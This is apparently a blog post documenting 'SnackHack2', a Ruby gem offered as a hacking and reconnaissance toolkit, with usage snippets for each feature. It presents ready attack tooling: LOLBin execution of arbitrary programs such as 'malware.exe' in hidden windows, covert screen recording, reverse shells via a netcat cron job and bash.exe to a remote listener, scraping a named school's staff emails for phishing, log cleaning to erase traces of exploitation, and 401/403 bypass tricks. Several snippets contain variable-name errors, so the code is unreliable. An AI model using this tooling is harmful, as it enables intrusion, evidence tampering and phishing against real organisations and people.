Michael Meade

SnackHack2: Hacking tool and Recon

by

Michael Meade
in , , ,

This tool comes in gem form and can also be downloaded from Github.com. Originally, this project would be my senior project, but I had to scrape the idea for a simpler project due to my course workload and mental health.

To install the gem run the command below.

gem install snackhack2

Indirect Command Injection

This code when ran, will create a pop-up with the title “CLICK ME”. The prompt will show the word “test”. This could be used to get the target to run a command or program. Of course, the prompt and title can be changed to anything.

cj = Snackhack2::CommandInjection.new
cj.prompt = "test"
ck.title = "CLICK ME"
cj.wlrmdr_With_prompt

As the name might apply, the code has the same function as the code above but without the prompt. By default it will run “calc.exe” but this can be changed as seen below.

cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.wlrmdr_without_prompt

Conhost

Conhost.exe is a LOLBin that can be used to execute commands. By default, it will execute “calc.exe”

cj = Snackhack2::CommandInjection.new
cj.exe = "malware.exe"
cj.conhost


## This will run the same thing but the window will be hidden. 
cj.conhost_hide

SSH.exe to execute command

Like before by default, the code below will run “calc.exe”. This can be changed to anything. 

cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.ssh

LolBin MSR.exe Recording Screen

The code below uses a feature built-in to windows to record the screen. It will save the screenshots to a file named “screenshots.zip” by default. Again, this can be easily changed. By default, it will record 60 seconds, but this can also be changed as seen below. 

ss = Snackhack2::ScreenShot.new
ss.time = 64
ss.run

IP Lookup

IP stands for Internet Protocol. Every computer and website has one. This feature uses nslookup and Ping to find the IP of the site.

i = Snackhack2::IpLookup.new("https://x.com")
i.run

Extract Emails from Website

A hacker or pen tester needs to find targets, one way of acquiring emails is using a spider to crawl a site to scrape all the emails that could be used for phishing. By default the max_depth is 2, of course, this can be changed like the example below. 

e = Snackhack2::Email.new("https://www.tupeloschools.com/leadership/staff-directory")
e.run

# set @max_depth to two
e.max_depth = 2
puts e.max_depth

Web Server log cleaner

This code will search web server logs for the given IP and replace the IP with a randomly generated IP. This is helpful for post-exploitation if a hacker or pen tester wants to remove any traces of scanning the web server or how they exploited a vulnerability in the web site. 

w = Snackhack2::WebServerCleaner.new('8.1.9.2')
w.run

WordPress

WordPress is another Content Management System. This function of the code works similar to how the Drupal score system works. The code tries to see if the site is built by WordPress. The higher the score the more likely that the site is built using WordPress. Every time that the code detects it might be WordPress, it will add 10 to the score. There currently are 7 elements in the array that the code uses to determine if it is a WordPress site. 

require "snackhack2"
w=Snackhack2::WordPress.new("https://kinsta.com)
w.run

Some of the features the code has is that will try to detect how many users there are and their usernames, see if there is any open directories.

Examples of other possible scripts can be found here.

Reverse Shell

Will print out the command to run and will set a cron job that will run every minute that will use NetCat to connect to the server.

l = Snackhack2::ReverseShell.new("6.1.9.1", "9")
l.run

This will use bash.exe to connect to a reverse shell. On the remote computer run: “nc -lvp 4444“. After running the code below the computer will connect to the remote server, giving the threat actor remote control of the computer. This is all done by Living of the Land, without any third-party tools, just the features built into Windows. This is favored by threat actors since they do not need to install any malware that could be detected and removed.

r = Snackhack2::ReverseShell.new("1.1.1.1", "4")
r.bash

## Version 2 of bash
r.version2

List Users

Search for Users on Windows. 

lu = Snackhack2::ListUsers.new
lu.user = "admin"
lu.windows_search_user

List users on Linux-based systems by viewing the “/etc/passwd” file. 

lu = Snackhack2::ListUsers.new
lu.linux

The code below will list all the users on a Windows-based system. 

lu = Snackhack2::ListUsers.new
lu.windows

Bypassing 403 & 401

This code performs a bunch of little tricks that will hopefully be able to bypass the pages. This might take a while because it uses a list of web paths.

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.dots

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.basic

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.uppercase

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.url_encode

Extract Crypto Addresses

  • Monero
  • Bitcoin
  • Litecoin
  • Dash
  • Stellar
  • Ethereum
  • Bitcoin Cash
  • Dogecoin
c = Snackhack2::CryptoExtractWebsite.new("https://coincarp.com/currencies/tron/richlist/")
puts ca.save_file
ca.save_file = false
puts ca.save_file
ca.run

ca.monero
ca.bitcoin
ca.litecoin
ca.dash
ca.stellar
ca.ethereum
ca.bitcoincash
ca.dogecoin

SiteMap XML

s = Snackhack2::SiteMap.new("https://x.com")
sm.run

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *